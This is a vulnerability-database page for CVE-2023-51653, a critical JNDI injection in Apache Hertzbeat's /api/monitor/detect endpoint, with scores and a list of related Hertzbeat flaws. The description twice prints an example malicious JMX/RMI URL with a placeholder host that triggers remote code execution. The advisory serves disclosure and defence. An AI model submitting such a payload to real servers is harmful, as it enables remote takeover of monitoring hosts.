← Vulnerability feed

Vulnerability record · CVE-2023-51653 · published 22 February 2024

CVE-2023-51653: Apache hertzbeat injection vulnerability

Apache · Hertzbeat

Hertzbeat is a real-time monitoring system. In the implementation of `JmxCollectImpl.java`, `JMXConnectorFactory.connect` is vulnerable to JNDI injection. The corresponding interface is `/api/monitor/detect`. If there is a URL field, the address will be used by default. When the URL is `service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari`, it can be exploited to cause remote code execution. Version 1.4.1 contains a fix for this issue.

9.8 CVSS 3.1 Critical EPSS 2.1% · top 18.9% CWE-74 · Injection
9.8CVSS 3.1 base score
2.1%EPSS exploitation probability, 30 days
NoNot in CISA KEV
1Affected product versions listed by NVD
4References, 2 tagged exploit
17 Jun 2026Last modified by NVD

Description

Hertzbeat is a real-time monitoring system. In the implementation of `JmxCollectImpl.java`, `JMXConnectorFactory.connect` is vulnerable to JNDI injection. The corresponding interface is `/api/monitor/detect`. If there is a URL field, the address will be used by default. When the URL is `service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari`, it can be exploited to cause remote code execution. Version 1.4.1 contains a fix for this issue.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Affected products

1 vulnerable configurations from NVD's CPE data, grouped by vendor and product.

References

Track CVE-2023-51653 inside VULONE

Watch it alongside the ransomware crews, C2 infrastructure and forum chatter that reference it, query it through the API and pull it into your SIEM over TAXII.

Start free Open in platform

Related vulnerabilities

Same products first, then exploited flaws of the same weakness class.

9.8CVE-2024-42361Apache hertzbeat sql injection vulnerabilityHertzbeat is an open source, real-time monitoring system. Hertzbeat 1.6.0 and earlier declares a /api/monitor/{monitorId}/metric/{metricFull} endpoin…EPSS 1.1%9.8CVE-2023-51388Apache hertzbeat injection vulnerabilityHertzbeat is a real-time monitoring system. In `CalculateAlarm.java`, `AviatorEvaluator` is used to directly execute the expression function, and no …EPSS 1.3%9.8CVE-2023-51389Apache hertzbeat deserialization of untrusted data vulnerabilityHertzbeat is a real-time monitoring system. At the interface of `/define/yml`, SnakeYAML is used as a parser to parse yml content, but no security co…EPSS 1.3%8.8CVE-2026-24343Apache hertzbeat vulnerabilityImproper Neutralization of Data within XPath Expressions ('XPath Injection') vulnerability in Apache HertzBeat. This issue affects Apache HertzBeat: …EPSS 0.73%8.8CVE-2025-24404Apache hertzbeat xml injection vulnerabilityXML Injection RCE by parse http sitemap xml response vulnerability in Apache HertzBeat. The attacker needs to have an authenticated account with acce…EPSS 0.52%8.8CVE-2025-48208Apache hertzbeat ldap injection vulnerabilityImproper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection') vulnerability in Apache HertzBeat . The attacker needs to have a…EPSS 0.63%8.8CVE-2024-41151Apache hertzbeat deserialization of untrusted data vulnerabilityDeserialization of Untrusted Data vulnerability in Apache HertzBeat. This vulnerability can only be exploited by authorized attackers. This issue aff…EPSS 0.98%8.8CVE-2024-45505Apache hertzbeat command injection vulnerabilityImproper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache HertzBeat (incubating). This vulnerabilit…EPSS 2.2%

Source: NIST National Vulnerability Database (record CVE-2023-51653), CISA KEV, FIRST EPSS (scores of 2026-09-27). This page is refreshed as NVD updates the record.